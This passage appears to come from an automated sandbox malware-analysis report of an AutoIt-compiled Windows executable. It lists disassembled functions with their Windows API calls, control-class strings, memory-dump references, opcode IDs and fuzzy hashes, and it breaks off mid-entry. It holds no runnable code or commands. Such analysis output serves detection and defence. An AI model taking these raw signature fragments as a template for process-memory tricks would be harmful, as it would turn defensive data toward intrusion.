                                                                                                                      • Part of subcall function 003813DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0037925A,00000034,?,?,00001004,00000000,00000000), ref: 0038142F
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003798AC
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003798F9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                    • Opcode ID: d7838dc91af3b844f1452e1c001a38af3a66b987e0d7f4faa12c2a685468915d
                                                                                                                    • Instruction ID: 1516a61d9a051dab220c44d94e6a7eca65e836853c8604b7bb6211a3b9d32166
                                                                                                                    • Opcode Fuzzy Hash: d7838dc91af3b844f1452e1c001a38af3a66b987e0d7f4faa12c2a685468915d
                                                                                                                    • Instruction Fuzzy Hash: 00414F76900218BFDB21EFA4CC81FDEBBB8EB09300F104199FA55B7191DA716E45CBA1
                                                                                                                    Function 003A7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003AF910,00000000,?,?,?,?), ref: 003A79DF
                                                                                                                    • GetWindowLongW.USER32 ref: 003A79FC
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003A7A0C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID: SysTreeView32
                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                    • Opcode ID: b8480e6793c91ed014345bdffb9ac585d4bc374ad5ed8dff734559dcf1ace820
                                                                                                                    • Instruction ID: 56cc3ee814fd2b7dab076e48949424e1393bcbdeda9530aa499ade567cc21d66
                                                                                                                    • Opcode Fuzzy Hash: b8480e6793c91ed014345bdffb9ac585d4bc374ad5ed8dff734559dcf1ace820
                                                                                                                    • Instruction Fuzzy Hash: 0731C331204605AFDB129E74DC85BEB77A9EF06324F214729F875932E0D731ED519B50
                                                                                                                    Function 003A73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003A7461
                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003A7475
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 003A7499
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window
                                                                                                                    • String ID: SysMonthCal32
                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                    • Opcode ID: 5186ac30bc090788b291382b67cdaf69255a3919d0812b025c73595654229cbc
                                                                                                                    • Instruction ID: 68efdbe3bdf749f71a241f49c3ae22b77ddedc7a70ac616a57d0cc946ae4e54e
                                                                                                                    • Opcode Fuzzy Hash: 5186ac30bc090788b291382b67cdaf69255a3919d0812b025c73595654229cbc
                                                                                                                    • Instruction Fuzzy Hash: 27219F32500218AFDF228EA5CC86FEA3B69EF4D724F120214FE156B1D0DA75AC519BA0
                                                                                                                    Function 003A7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003A7C4A
                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003A7C58
                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003A7C5F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                    • String ID: msctls_updown32
                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                    • Opcode ID: d740da50e6d676060c71c16a3412599c287576144c02aaa57af3abecec8d0dfc
                                                                                                                    • Instruction ID: eb66aac7f8167de733f62dc3bba91b9fa05e8b4eed6e0eeeeb7af42b73d10ac9
                                                                                                                    • Opcode Fuzzy Hash: d740da50e6d676060c71c16a3412599c287576144c02aaa57af3abecec8d0dfc
                                                                                                                    • Instruction Fuzzy Hash: 52217CB5604208AFDB12DF24DCC1DA637EDEB5A3A4B150159F9019B3A1CB31EC118AA0
                                                                                                                    Function 003A6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003A6D3B
                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003A6D4B
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003A6D70
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                    • String ID: Listbox
                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                    • Opcode ID: d7e9dc010c8454e7d00abeb7ea9db723efe6f77319807cbddc24b48369828b48
                                                                                                                    • Instruction ID: 238f683188670884e012f48be839e21d3959ac13521faab4abc83c4d1782fc74
                                                                                                                    • Opcode Fuzzy Hash: d7e9dc010c8454e7d00abeb7ea9db723efe6f77319807cbddc24b48369828b48
                                                                                                                    • Instruction Fuzzy Hash: FD219232610118BFDF128F54DC46FBB3BBEEF8A760F058124FA459B1A0C6719C518BA0
                                                                                                                    Function 003939E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __snwprintf.LIBCMT ref: 00393A66
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __snwprintf_memmove
                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d$%;
                                                                                                                    • API String ID: 3506404897-1637619084
                                                                                                                    • Opcode ID: bf80fbdcac755b2b39db3309b51741884c86b5ed06920178faea96b24ebbf1b0
                                                                                                                    • Instruction ID: ffdb630cb86340edfa6cac75239e98f47ace0829db7463fae4f5f72405ec8bb6
                                                                                                                    • Opcode Fuzzy Hash: bf80fbdcac755b2b39db3309b51741884c86b5ed06920178faea96b24ebbf1b0
                                                                                                                    • Instruction Fuzzy Hash: 77218071A00229AFCF12EF64DC82EEE77B9BF44700F504459F459AB281DB34EA45CBA1
                                                                                                                    Function 003A770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003A7772
                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003A7787
                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003A7794
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                    • Opcode ID: 557f4e1ea0b95f908b9cf6eb70a5234ec3b426b5ca3052350b8a5e2834543003
                                                                                                                    • Instruction ID: 019137c9b0aed20eacff31d37bdca57e0fb96fb0b98b99373fd0500a13cef998
                                                                                                                    • Opcode Fuzzy Hash: 557f4e1ea0b95f908b9cf6eb70a5234ec3b426b5ca3052350b8a5e2834543003
                                                                                                                    • Instruction Fuzzy Hash: 6C11E772244208BEEF215F65CC45FE7776DEF8AB54F124119F641960A0D672E811CB10
                                                                                                                    Function 00346B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __calloc_crt
                                                                                                                    • String ID: =$@B>
                                                                                                                    • API String ID: 3494438863-1261725584
                                                                                                                    • Opcode ID: 5a257229bba5051e17cab9cc7781241534fec792a57b730521d514266411f3df
                                                                                                                    • Instruction ID: 5c87b7012247e5bc516d67ac509814b84de28e8b29dbc9dd7a2a852865122731
                                                                                                                    • Opcode Fuzzy Hash: 5a257229bba5051e17cab9cc7781241534fec792a57b730521d514266411f3df
                                                                                                                    • Instruction Fuzzy Hash: 47F06875604A118BF7779F56BC92B662BD9E701734F50091AE300CE6D0EB70AC4186C5
                                                                                                                    Function 00349B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __lock.LIBCMT ref: 00349B94
                                                                                                                      • Part of subcall function 00349C0B: __mtinitlocknum.LIBCMT ref: 00349C1D
                                                                                                                      • Part of subcall function 00349C0B: EnterCriticalSection.KERNEL32(00000000,?,00349A7C,0000000D), ref: 00349C36
                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00349BA4
                                                                                                                      • Part of subcall function 00349100: ___addlocaleref.LIBCMT ref: 0034911C
                                                                                                                      • Part of subcall function 00349100: ___removelocaleref.LIBCMT ref: 00349127
                                                                                                                      • Part of subcall function 00349100: ___freetlocinfo.LIBCMT ref: 0034913B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                                                                    • String ID: 8=$8=
                                                                                                                    • API String ID: 547918592-1747748129
                                                                                                                    • Opcode ID: 2bf307d6e6b3f4b8a7d517a676fe8fac4f7b8eac561715750ffaf91a2968ef63
                                                                                                                    • Instruction ID: 7964594b922025007c9961b51ac77c6c4dd7853624c23607dfe91ab635c8a64c
                                                                                                                    • Opcode Fuzzy Hash: 2bf307d6e6b3f4b8a7d517a676fe8fac4f7b8eac561715750ffaf91a2968ef63
                                                                                                                    • Instruction Fuzzy Hash: 43E08C32D4BB00AAEA13BBE47903B4E2BD49B00B21F20015BF0555D1C1CEB438008617
                                                                                                                    Function 00324C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00324B83,?), ref: 00324C44
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00324C56
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 2574300362-1355242751
                                                                                                                    • Opcode ID: 96918b5cb33adfa5254dd2c49ea59e3afa72452af909087cb6e4c7fddff8a3c9
                                                                                                                    • Instruction ID: 81b48fbc744eb045cc11bc0553d0cd86830f79f7a355ee55101362ea3155d398
                                                                                                                    • Opcode Fuzzy Hash: 96918b5cb33adfa5254dd2c49ea59e3afa72452af909087cb6e4c7fddff8a3c9
                                                                                                                    • Instruction Fuzzy Hash: CFD01231510723DFD7225F75E94864676E9EF06351F11883AD497D6160E670D480C650
                                                                                                                    Function 00324C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00324BD0,?,00324DEF,?,003E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00324C11
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00324C23
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                    • Opcode ID: 144f37dc0ea9fc6d581754f46d60c94fadbea65c0451cb75e438a8f12a3b2c55
                                                                                                                    • Instruction ID: b0ebac2618c66e115c2dcf1f7a8ad7686d2dc68393c9c2e0ddd73421276c345f
                                                                                                                    • Opcode Fuzzy Hash: 144f37dc0ea9fc6d581754f46d60c94fadbea65c0451cb75e438a8f12a3b2c55
                                                                                                                    • Instruction Fuzzy Hash: 85D01231511723DFD722AFB5ED48646B6E9EF0A352F118C3AD486D6160E6B0D480C650
                                                                                                                    Function 003A0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,003A1039), ref: 003A0DF5
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003A0E07
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                    • Opcode ID: 4e11be68763bbbb3a99c371259dc8e1d97f33a35cd2af4002d70a2f6bc41b962
                                                                                                                    • Instruction ID: 3c819ac8f2366531a995d012635b536ffc4c29d5290601a423b2470273558120
                                                                                                                    • Opcode Fuzzy Hash: 4e11be68763bbbb3a99c371259dc8e1d97f33a35cd2af4002d70a2f6bc41b962
                                                                                                                    • Instruction Fuzzy Hash: 79D01271550712CFD7235FB5E848786B6D9AF16351F118C7FD486D2250D6B0D490C650
                                                                                                                    Function 003990E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00398CF4,?,003AF910), ref: 003990EE
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00399100
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                    • Opcode ID: f449b2ddeecc02ce2c12a874a2185b62d524528a9033cb2e071936c4acea901b
                                                                                                                    • Instruction ID: aacdd36ce8fb1781275d4368f419f749b4bcf3af86a9aa6238167f883d880b87
                                                                                                                    • Opcode Fuzzy Hash: f449b2ddeecc02ce2c12a874a2185b62d524528a9033cb2e071936c4acea901b
                                                                                                                    • Instruction Fuzzy Hash: 18D01235510713CFDB229F76D85864676E8AF06352F178C3ED486D6550E670D480C650
                                                                                                                    Function 00361714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime__swprintf
                                                                                                                    • String ID: %.3d$WIN_XPe
                                                                                                                    • API String ID: 2070861257-2409531811
                                                                                                                    • Opcode ID: d8b60cf86c03b3981e46b3ea6cb27a5d39882d3d8f4305f812d0a2d09dd37b2e
                                                                                                                    • Instruction ID: fd8c29aea86cd04e636d189c433bd43ec69df5aeedcb1808933cd997fa2fdd81
                                                                                                                    • Opcode Fuzzy Hash: d8b60cf86c03b3981e46b3ea6cb27a5d39882d3d8f4305f812d0a2d09dd37b2e
                                                                                                                    • Instruction Fuzzy Hash: A1D05E72804119FACB039B90EC8CDFD73BCAB09301F188463F406E3444E2369B94EA21
                                                                                                                    Function 0037717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 280b8f40837f8e4d9c9d1ad5fe654a56076bd35329a217da397fa1e49c520843
                                                                                                                    • Instruction ID: 069559296681739f2f8fc813d0eb6dcb8a8b8e4ecb691fd2ff1b928ae68f0a1d
